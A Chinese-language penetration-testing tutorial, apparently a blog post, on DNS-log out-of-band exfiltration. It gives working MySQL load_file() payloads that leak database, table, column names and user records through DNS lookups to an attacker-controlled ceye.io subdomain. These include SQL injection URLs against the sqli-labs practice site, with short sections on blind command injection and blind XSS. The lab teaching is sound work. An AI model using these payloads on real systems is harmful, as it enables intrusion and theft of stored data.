渗透测试中dns log的使用

àì夳堔傛蜴生んèń 2023-01-19 04:52 236阅读 0赞

# 一、预备知识 #

dns（域名解析）：

域名解析是把域名指向网站空间IP，让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址，为了方便记忆，采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。

域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说的简单点就是将好记的域名解析成IP，服务由DNS服务器完成，是把域名解析到一个IP地址，然后在此IP地址的主机上将一个子目录与域名绑定。

互联网中的地址是数字的IP地址，域名解析的作用主要就是为了便于记忆。（摘自百度百科）

dns服务器的端口是53。

# 二、原理 #

我们输入域名之后 我们的本地域名服务器会把在自身服务器里面查询是否存在ip地址 如果没有则发送到根域名服务器 如果根域名服务器里面有对应的记录则返回 如果没有则告诉本地域名服务器去向顶级域名服务器查找。

dns在解析的时候会留下记录。

简单来说：

![0dea3519bcd939dc0eeafd6c6f55e110.png][]

当dns服务器是我们自己的时，我们就可以通过查看日志来查询一些信息

--------------------

# 三、准备 #

1.  dns服务器（vps搭建）
2.  dns指向我们自己搭建的dns服务器的域名

或者也可以使用网上的平台，比如[http://ceye.io][http_ceye.io]

--------------------

# 四、用处 #

1.  sql注入（主要）
2.  命令注入
3.  xss盲打

--------------------

#  五、实验：sql注入 #

dns log在sql注入中的使用主要因为传统sql注入需要向服务器发送大量数据包，容易被检测、延时注入花费时间长等原因

在[http://ceye.io][http_ceye.io]这个平台注册后它会给你一个三级域名，可以先访问任意四级域名试试

![9eba95ed0eb2e228f4bc2a5505f0b092.png][]

![57c20ce45ecbf5b813ac7be3729be11c.png][]

在网站上查询到了访问的dns记录

windows的共享功能同样也会访问dns服务器

![3e508d5ea1c12e1d4f5a56174aedef42.png][]

![d206635094691fe5171c7ce92d7610f1.png][]

关于mysql load\_file()函数：

在MySQL中，LOAD\_FILE()函数读取一个文件并将其内容作为字符串返回。

LOAD\_FILE(file\_name)

其中file\_name是文件的完整路径。

这个函数也可以用来发送dns解析请求，这就是关键

load\_file()使用限制：

1.文件必须位于服务器主机上。

2.你必须具有该FILE权限才能读取该文件。拥有该FILE权限的用户可以读取服务器主机上的任何文件，该文件是world-readable的或MySQL服务器可读的。

3.文件必须是所有人都可读的，并且它的大小小于max\_allowed\_packet字节。

你可以这样检查: SHOW VARIABLES LIKE 'max\_allowed\_packet';

![6ff312a455bb953cca5e42a3d1a90c9a.png][]

如果secure\_file\_priv系统变量被设置为非空目录名，则要加载的文件必须位于该目录中。

你可以这样检查: SHOW VARIABLES LIKE 'secure\_file\_priv';

![6e01eb249d1bcb24e7e7d16f7c73bba5.png][]

可以在mysql配置文件my.ini中更改secure\_file\_priv的值，如果没有这个参数可以手动添加

![57d2e061a49d6b902bf1534772209440.png][]

使用load\_file()读取文件： select load\_file("d:\\\\1.txt");

![967bde24dd713d8a0dc1d4316aba7573.png][]

使用load\_file()发送dns请求： select load\_file("\\\\\\\\ccc.xxxx.ceye.io\\\\aaa");

'\\'在sql语句中要转义，aaa可以改成任意字母。

![b9fe733c8cc340eca2af0e8e7285c63c.png][]

使用load\_file()发送dns请求查询数据库： select load\_file(concat("\\\\\\\\",(select database()),".xxxx.ceye.io\\\\aaa"));

sql语句在双引号内不执行，所以要用concat()函数拼接。

![a8fdf13c387cff57dad096994e3aa447.png][]

查询数据表：

select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.xxxx.ceye.io\\aaa'));

![f8021af745dce2b1362784d8ff0b7513.png][]

查询字段：

select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='test' limit 0,1),'.xxxx.ceye.io\\aaa'));

![70a7a93bb62818113bf111d26ba24c71.png][]

查询数据：

select load_file(concat('\\\\',(select username from test limit 0,1),'.xxxx.ceye.io\\aaa'));

![5c76b41b95428ae992859f244e0432a2.png][]

需要注意的是dns服务器无法接收符号，当查询的数据中存在符号时需要编码，这里用hex()编码（ord()一次只能编码一个字符）。

![4c03c576a629c6daa5086d40c666c3e4.png][]

select load_file(concat('\\\\',(select hex(username) from test limit 2,1),'.xxxx.ceye.io\\aaa'));

![7d4b136fd41015fc37c25e749d8e96f6.png][]

再使用sqli-labs第五关做实验

payload:

?id=1' and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\aaa'))),1,1)--+

![e86892bd47cc7b56b574c71eaa5841b6.png][]

?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.xxxx.ceye.io\\aaa'))),1,1)--+

![079bc71cf925dfee28e93771ddca8da8.png][]

?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='emails' limit 1,1),'.xxxx.ceye.io\\aaa'))),1,1)--+

![e7c0d8a55acca477346884a6856c9129.png][]

?id=1' and if((select load_file(concat('\\\\',(select hex(email_id) from emails limit 0,1),'.xxxx.ceye.io\\aaa'))),1,1)--+

由于查询的数据存在@符号，使用了hex()函数

![dd344310d19d7d0f7343a01ed5e79b9c.png][]

解码得Dumb@dhakkan.com

--------------------

#  六、其他实验 #

## 1.命令注入 ##

适用于无回显的命令注入点

使用dvwa靶场的命令注入模块实验

假设该注入点无回显

![1b6839ede38cb8a9c617c4e8025c805a.png][]

![e96c54c98ee6c9df0ff657354f086214.png][]

查询到了我们输入的变量

windows常用变量：

*  //变量                                                            类型       描述
 *  //%ALLUSERSPROFILE%                           本地       返回“所有用户”配置文件的位置。
 *  //%APPDATA%               　　                      本地       返回默认情况下应用程序存储数据的位置。
 *  //%CD%                                                        本地       返回当前目录字符串。
 *  //%CMDCMDLINE%                                     本地       返回用来启动当前的 Cmd.exe 的准确命令行。
 *  //%CMDEXTVERSION%                              系统       返回当前的“命令处理程序扩展”的版本号。
 *  //%COMPUTERNAME%                              系统       返回计算机的名称。
 *  //%COMSPEC%                                           系统       返回命令行解释器可执行程序的准确路径。
 *  //%DATE%                                                    系统       返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。
 *  //%ERRORLEVEL%                                     系统       返回上一条命令的错误代码。通常用非零值表示错误。
 *  //%HOMEDRIVE%                                       系统       返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
 *  //%HOMEPATH%                                         系统       返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
 *  //%HOMESHARE%                                      系统       返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
 *  //%LOGONSERVER%                                 本地       返回验证当前登录会话的域控制器的名称。
 *  //%NUMBER\_OF\_PROCESSORS%           系统       指定安装在计算机上的处理器的数目。
 *  //%OS%                                                        系统       返回操作系统名称。Windows 2000 显示其操作系统为 Windows\_NT。
 *  //%PATH%                                                    系统       指定可执行文件的搜索路径。
 *  //%PATHEXT%                                             系统       返回操作系统认为可执行的文件扩展名的列表。
 *  //%PROCESSOR\_ARCHITECTURE%       系统       返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。
 *  //%PROCESSOR\_IDENTFIER%                系统       返回处理器说明。
 *  //%PROCESSOR\_LEVEL%                        系统       返回计算机上安装的处理器的型号。
 *  //%PROCESSOR\_REVISION%                  系统       返回处理器的版本号。
 *  //%PROMPT%                                             本地       返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。
 *  //%RANDOM%                                            系统       返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。
 *  //%SYSTEMDRIVE%                                  系统       返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。
 *  //%SYSTEMROOT%                                  系统       返回 Windows server operating system 根目录的位置。
 *  //%TEMP%和%TMP%                                系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。
 *  //%TIME%                                                   系统       返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息，请参阅 Time。
 *  //%USERDOMAIN%                                   本地       返回包含用户帐户的域的名称。
 *  //%USERNAME%                                       本地       返回当前登录的用户的名称。
 *  //%USERPROFILE%                                  本地       返回当前用户的配置文件的位置。
 *  //%WINDIR%                                              系统       返回操作系统目录的位置。

## 2.xss盲打 ##

使用pikachu的xss盲打模块

![8e29b63d9360a14495beba0cf282ca4f.png][]

![65e4d97e0840bef06138463b889358de.png][]

收到请求说明触发了插入的js代码

--------------------

## 七、sqlmap使用dns ##

sqlmap可以使用--dns-domain参数实现自动化dns注入

[0dea3519bcd939dc0eeafd6c6f55e110.png]: /images/20221021/2ad6102a2e1b4db993ebb18e04dfce6b.png
[http_ceye.io]: http://ceye.io/
[9eba95ed0eb2e228f4bc2a5505f0b092.png]: /images/20221021/2ba486b6fe7444c0a2fd3ee0bc00217d.png
[57c20ce45ecbf5b813ac7be3729be11c.png]: /images/20221021/cdf0498deea8430bad5dc1862b323a5f.png
[3e508d5ea1c12e1d4f5a56174aedef42.png]: /images/20221021/d3b6b0c294094975acb5141f5c8429f1.png
[d206635094691fe5171c7ce92d7610f1.png]: /images/20221021/cdb1f895438e4b8fa3e176de2d565285.png
[6ff312a455bb953cca5e42a3d1a90c9a.png]: /images/20221021/68d824adad23436e96100a3e47f3eb39.png
[6e01eb249d1bcb24e7e7d16f7c73bba5.png]: /images/20221021/59d59a69f5914088ac1b449c8e2f84bc.png
[57d2e061a49d6b902bf1534772209440.png]: /images/20221021/8c89cc8e4d0f4b2b9aa0f62fd02b59ed.png
[967bde24dd713d8a0dc1d4316aba7573.png]: /images/20221021/cb2917668dfc45ca90832c312418432a.png
[b9fe733c8cc340eca2af0e8e7285c63c.png]: /images/20221021/a6f95a0436244e168c86e722c35cb2c7.png
[a8fdf13c387cff57dad096994e3aa447.png]: /images/20221021/e9594f7b5ba247b391b93615432972c6.png
[f8021af745dce2b1362784d8ff0b7513.png]: /images/20221021/2e8f0063b0734480af49b4ba074b66f2.png
[70a7a93bb62818113bf111d26ba24c71.png]: /images/20221021/9c39f415ef094378b61c1240b9d71d2d.png
[5c76b41b95428ae992859f244e0432a2.png]: /images/20221021/49fd58e7bc70461e96988817213351ff.png
[4c03c576a629c6daa5086d40c666c3e4.png]: /images/20221021/1343311640444c8daa3f8f8cdf54100f.png
[7d4b136fd41015fc37c25e749d8e96f6.png]: /images/20221021/17fceb74df104a359d400d15b2ff3ea6.png
[e86892bd47cc7b56b574c71eaa5841b6.png]: /images/20221021/155eb3eeba1d4ccfb1afd9237f229dff.png
[079bc71cf925dfee28e93771ddca8da8.png]: /images/20221021/1ee95d51e8084b00bde2389c9087c79d.png
[e7c0d8a55acca477346884a6856c9129.png]: /images/20221021/e9c1ba0494d44a9b8cee2179ee1b079c.png
[dd344310d19d7d0f7343a01ed5e79b9c.png]: /images/20221021/7042e32007924cd484f5fd470f13ef31.png
[1b6839ede38cb8a9c617c4e8025c805a.png]: /images/20221021/de226730c0924d7f99138f7d9bc4db72.png
[e96c54c98ee6c9df0ff657354f086214.png]: /images/20221021/9fb6baec194d4ef6a8fe97c13098f30c.png
[8e29b63d9360a14495beba0cf282ca4f.png]: /images/20221021/ffff13b0038745a2875a7fc84892fe82.png
[65e4d97e0840bef06138463b889358de.png]: /images/20221021/7da11a5d4849460382f5315f61012db3.png